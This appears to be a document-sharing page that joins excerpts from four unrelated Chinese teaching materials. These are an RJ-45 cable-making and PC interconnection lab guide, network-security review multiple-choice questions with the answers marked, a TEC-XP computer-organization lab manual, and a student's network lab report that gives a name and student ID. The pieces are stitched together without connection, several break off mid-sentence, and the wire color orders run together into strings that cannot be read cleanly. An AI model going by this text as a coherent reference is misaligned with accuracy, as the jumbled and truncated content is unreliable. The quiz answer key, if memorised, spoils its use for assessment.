计算机网络基础与应用实训指导书 实验一、两台计算机互连 实验目的: 1、掌握正线和反线两种网线接头的制作。 2、认识和熟练应用网线制作的专用工具。 实验设备: EIA/TIA-568标准5类UTP,RJ-45水晶头,双绞线网钳,网络测试仪 实验所需软件:无 实验步骤: (一)正线的制作方法 1、使用双绞线网钳的剪切口剪齐一段UTP电缆两段。 2、使用双绞线网钳的剥线口剥除双绞线外皮,露出4对裸线。 3、将4对裸线分别捋平,排列整齐,颜色按照EIA/TIA-568–B标准排列。 568B标准排列为: 1 2 3 4 5 6 7 8 橙白橙绿白蓝蓝白绿棕白棕 100BASE-T4 RJ-45对双绞线网线接法的规定如下:1、2用于发送,3、6用于接收,4、5,7、8是双向线。 4、使用双绞线网钳的剪切口把参差不齐的8根裸线剪齐。 5、将RJ-45接头弹片朝下,把整齐的8根裸线插入其中,使得8根裸线的横切面紧 贴RJ-45接头的底面。 6、将RJ-45接头插入双绞线网钳的压线口,用力握紧手柄。 7、制作另一端(重复第2步到第6步)。 (二) 反线的制作方法 1、网线一端的接头制作与正线相同,另一端的接头制作应按照568-A标准的要求 制作。 568A标准排列为: 1 2 3 4 5 6 7 8 绿白绿橙白蓝蓝白橙棕白棕 注意: 1.正线用于连接不同网络设备。

2.反线用于连接相同网络设备。 实验二、多台计算机互连 实验目的: 1、懂得星型结构最常用的连接设备(交换机) 2、熟练掌握直连线的制作与测试 3、懂得网关的配置 4、懂得用Ping命令测试 5、懂得不能互通故障的排除方法 实验设备: N台计算机,网线,水晶头,网卡,交换机,标准直通线一根、交叉线一根,网线制作工具,网线测试工具等 实验所需软件:无 实验步骤: 任务 1:我知道哪些配件 我的学习 1、网络分类; 2、局域网; 3、组成局域网所需配件; 4、局域网的设计原则 任务 2:我会制作与测试直连线 操作过程与交叉线相似,只是线序的编排(第三步)有区别。按(白橙、橙、白绿、绿、白蓝、蓝、白棕、棕)的顺序拆分开。 注意事项 第一步中注意:剥与大拇指一样长就行了,一般2~3cm,有一些双绞线电缆上含有一条柔软的尼龙绳,如果您在剥除双绞线的外皮时,觉得裸露出的部分太短,而不利于制作RJ-45接头时,可以紧握双绞线外皮,再捏住尼龙线往外皮的下方剥开,就可以得到较长的裸露线; 第二步中注意:把线尽量抻直(不要缠绕)、压平(不要重叠)、挤紧理

网络攻防原理复习题分析

1.目前,流行的局域网主要有三种,其中不包括:(D )。 A.以太网;B.令牌环网; C.FDDI(光纤分布式数据接口);D.A TM(异步传输模式)。 2.解决IP欺骗技术的最好方法是安装过滤路由器,在该路由器的过滤规则中,正确的是:(C ) A.允许包含内部网络地址的数据包通过该路由器进入; B.允许包含外部网络地址的数据包通过该路由器发出; C.在发出的数据包中,应该过滤掉源地址与内部网络地址不同的数据包; D.在发出的数据包中,允许源地址与内部网络地址不同的数据包通过。 3.在以下网络互连设备中,(D )通常是由软件来实现的。 A、中继器 B、网桥 C、路由器 D、网关 4.在网络信息安全模型中,(A )是安全的基石。它是建立安全管理的标准和方法。A.政策,法律,法规;B.授权; C.加密;D.审计与监控 5.下列口令维护措施中,不合理的是:(B ) A.第一次进入系统就修改系统指定的口令; B.怕把口令忘记,将其记录在本子上; C.去掉guest(客人)账号; D.限制登录次数。 6.病毒扫描软件由(C )组成 A.仅由病毒代码库; B.仅由利用代码库进行扫描的扫描程序; C.代码库和扫描程序 D.以上都不对 7.网络病毒是由因特网衍生出的新一代病毒,即Java及ActiveX病毒。由于(A ),因此不被人们察觉。 A.它不需要停留在硬盘中可以与传统病毒混杂在一起 B.它停留在硬盘中且可以与传统病毒混杂在一起 C.它不需要停留在硬盘中且不与传统病毒混杂在一起 D.它停留在硬盘中且不与传统病毒混杂在一起 8.用无病毒的DOS引导软盘启动计算机后,运行FDISK 用于(C )。 A.磁盘格式化 B.读取或重写软盘分区表 C.读取或重写硬盘分区表 D.仅是重写磁盘分区表 9.以下属于加密软件的是(C ) A.CA B.RSA C.PGP D.DES 10. 以下关于DES加密算法和IDEA加密算法的说法中错误的是:(D ) A. DES是一个分组加密算法,它以64位为分组对数据加密 B. IDEA是一种使用一个密钥对64位数据块进行加密的加密算法 C. DES和IDEA均为对称密钥加密算法 D. DES和IDEA均使用128位(16字节)密钥进行操作 11.以下关于公用/私有密钥加密技术的叙述中,正确的是:(C )

计算机组成原理实验报告册

实验一监控程序与汇编实验 实验时间:第周星期年月日节实验室:实验台: (以上部分由学生填写,如有遗漏,后果由学生本人自负) 1、实验目的 1)了解教学计算机的指令格式、指令编码、选择的寻址方式和具体功能。 2)了解汇编语言的语句与机器语言的指令之间的对应关系,学习用汇编语言设计程序的过程和方法。 3)学习教学机监控程序的功能、监控命令的使用方法,体会软件系统在计算机组成中的地位和作用。 2、实验平台 硬件平台:清华大学TEC-XP实验箱的MACH部分 软件平台:监控程序pcec16.exe、PC端指令集仿真软件 3、实验要求 1)学习联机使用TEC-XP 教学实验系统和仿真终端软件PCEC16.; 2)使用监控程序的R 命令显示/修改寄存器内容、D 命令显示存储器内容、E 命令修改存储器内容; 3)使用A 命令写一小段汇编程序,使用U命令观察汇编码与机器码之间的关系,用G 命令连续运行该程序,用T命令单步运行并观察程序单步执行情况。 **代码不得写到0000——1FFF的地址单元中,如有违反将被取消当堂成绩 4、操作步骤及实验内容 1)实验箱功能开关设置及联机操作: 1. 将实验箱COM1口与PC机相连; 2. 设置功能状态开关为00110; 3. 于PC端运行Pcec16.exe; 4. 按RESET,START键,若PC端出现如下输出(如图1.1所示),则操作成功; 图1.1 2)仿真软件相关操作:

1. 在项目文件夹找到tec2ksim.exe并启动; 图2.1 2. 点击文件-启动监控程序; 图2.2 4.若PC端出现如下输出(如图2.3所示),则操作成功;

计算机网络基础实验报告材料

学生实验报告 (理工类) 课程名称:计算机网络基础专业班级M12机械设计及其自动化 (专转本) 学生学号: 1221408019 学生姓名:丁世斌 所属院部:龙蟠学院指导教师:司海飞 20 13 ——20 14 学年第一学期 金陵科技学院教务处制

实验报告书写要求 实验报告原则上要求学生手写,要求书写工整。若因课程特点需打印的,要遵照以下字体、字号、间距等的具体要求。纸张一律采用A4的纸张。 实验报告书写说明 实验报告中一至四项内容为必填项,包括实验目的和要求;实验仪器和设备;实验内容与过程;实验结果与分析。各院部可根据学科特点和实验具体要求增加项目。 填写注意事项 (1)细致观察,及时、准确、如实记录。 (2)准确说明,层次清晰。 (3)尽量采用专用术语来说明事物。 (4)外文、符号、公式要准确,应使用统一规定的名词和符号。 (5)应独立完成实验报告的书写,严禁抄袭、复印,一经发现,以零分论处。 实验报告批改说明 实验报告的批改要及时、认真、仔细,一律用红色笔批改。实验报告的批改成绩采用百分制,具体评分标准由各院部自行制定。 实验报告装订要求 实验批改完毕后,任课老师将每门课程的每个实验项目的实验报告以自然班为单位、按学号升序排列,装订成册,并附上一份该门课程的实验大纲。

实验项目名称:互联网络综合应用实验学时: 8 同组学生姓名:实验地点: C306、C304 实验日期: 2013.11.26;12.3;12.10;12.17 实验成绩: 批改教师:司海飞批改时间: 一、实验目的和要求 目的:使用和熟悉互联网络常见的服务和命令,浏览器的使用和设置,了解 知识产权知识,电子商务,网上教育和网上办公。掌握客户/服务器模式和浏览 器模式,了解其他互联网络应用如网络目录服务,BBS,视频会议等。 要求:在互联计算机网络机房上机,要求浏览器的使用和设置,网络资源共 享的应用,使用常用的工具上网检索几个指定信息,用telnet登录一个服务器,并用ping 访问并比较就近的站点和远处的站点,看其响应时间和传输速率等增 加对网络的感觉,用户间收发电子邮件等。了解知识产权知识,电子商务,网上 教育和网上办公。在互联计算机网络机房上机,IP地址的设置,要求使用ftp 下载文件,网上新闻,电子公告板服务等,电子邮政技术,WWW信息发布技术。掌握客户/服务器模式和浏览器模式。了解其他互联网络应用,如网络目录服务,BBS,视频会议等。网络安全知识,端口的设置等。 二、实验仪器和设备 工科楼C306、C304机房,PC机,可访问因特网。 三、实验过程 1)打开IE或其他网页浏览器的“工具”菜单,找到“Internet选项”命令; a.在“连接”页中设置代理服务器: IP:192.168.0.1 端口号:8080 对本地地址不使用代理服务器,并能指定不使用代理服务器的指定IP地址(“高级”按钮的“例外”);

相关文档
最新文档